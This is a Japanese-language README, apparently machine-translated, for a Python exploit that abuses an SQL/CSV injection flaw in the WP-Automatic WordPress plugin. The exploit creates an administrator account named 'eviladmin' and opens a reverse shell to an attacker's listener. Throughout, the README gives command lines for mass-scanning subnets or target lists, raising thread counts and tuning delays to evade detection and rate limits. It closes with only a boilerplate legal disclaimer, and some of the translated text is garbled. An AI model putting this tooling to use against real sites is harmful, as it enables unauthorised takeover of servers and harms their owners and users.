このPythonスクリプトは、WordPressサイトで新しい管理者アカウントを作成し、ターゲットサーバーでリバースシェルを実行するプロセスを自動化します。 WP-AutomaticプラグインのCSVインジェクションの脆弱性を利用して、WordPressデータベースでSQLクエリを実行し、管理アクセスを獲得します。
サブネットのスキャン:脆弱なWordPressインストールのためにサブネットをスキャンする場合は、 --subnetオプションを使用できます。例えば:
python wp-automatic-exploit.py --subnet 192.168.1.0/24 --lhost 127.0.0.1 --lport 1414 --threads 10 --delay 1.0
このコマンドは、脆弱なWP自動プラグインを使用してWordPressサイトの192.168.1.0/24サブネットをスキャンし、提供されたリスナー設定を使用してそれらを悪用しようとします。
遅延のカスタマイズ:リクエスト間の遅延は、 --delayオプションを使用して調整できます。遅延が高くなると、検出やレートの制限を回避するのに役立つ場合がありますが、遅延が低いと搾取プロセスが高速化される可能性があります。例えば:
python wp-automatic-exploit.py --targets targets.txt --lhost 127.0.0.1 --lport 1414 --threads 10 --delay 2.5
このコマンドは、リクエストの間に2.5秒の遅延を使用します。
リモートリスナーの使用:リスナーがリモートマシンでセットアップされている場合、 --lhostおよび--lportオプションを使用してIPアドレスとポートを指定できます。例えば:
python wp-automatic-exploit.py --targets targets.txt --lhost 192.168.1.100 --lport 8080 --threads 10 --delay 1.0
このコマンドは、 192.168.1.100:8080 :8080のリスナーに戻ります。
スレッドの数を増やす:スクリプトで使用されるスレッドの数を、 --threadsオプションで増やすことができます。これにより、搾取プロセスが高速化される可能性がありますが、検出の可能性を高めたり、レート制限の問題を引き起こす可能性もあります。例えば:
python wp-automatic-exploit.py --targets targets.txt --lhost 127.0.0.1 --lport 1414 --threads 20 --delay 1.0
このコマンドは、搾取に20個のスレッドを使用します。
requestsライブラリ( pip install requestsを介してインストール)domain変数をターゲットWordPressサイトのURLに置き換えます。eviladminという名前の新しい管理者ユーザーが作成され、パスワードを設定し、管理権限を割り当てます。注:このスクリプトを実行する前に、適切な承認と許可があることを確認してください。これは、セキュリティの脆弱性と法的結果を悪用した場合につながる可能性があるためです。
このスクリプトは、教育およびテストのみを目的としています。著者は、このスクリプトの不正または違法使用に対する責任を負いません。あなた自身の責任でそれを使用してください。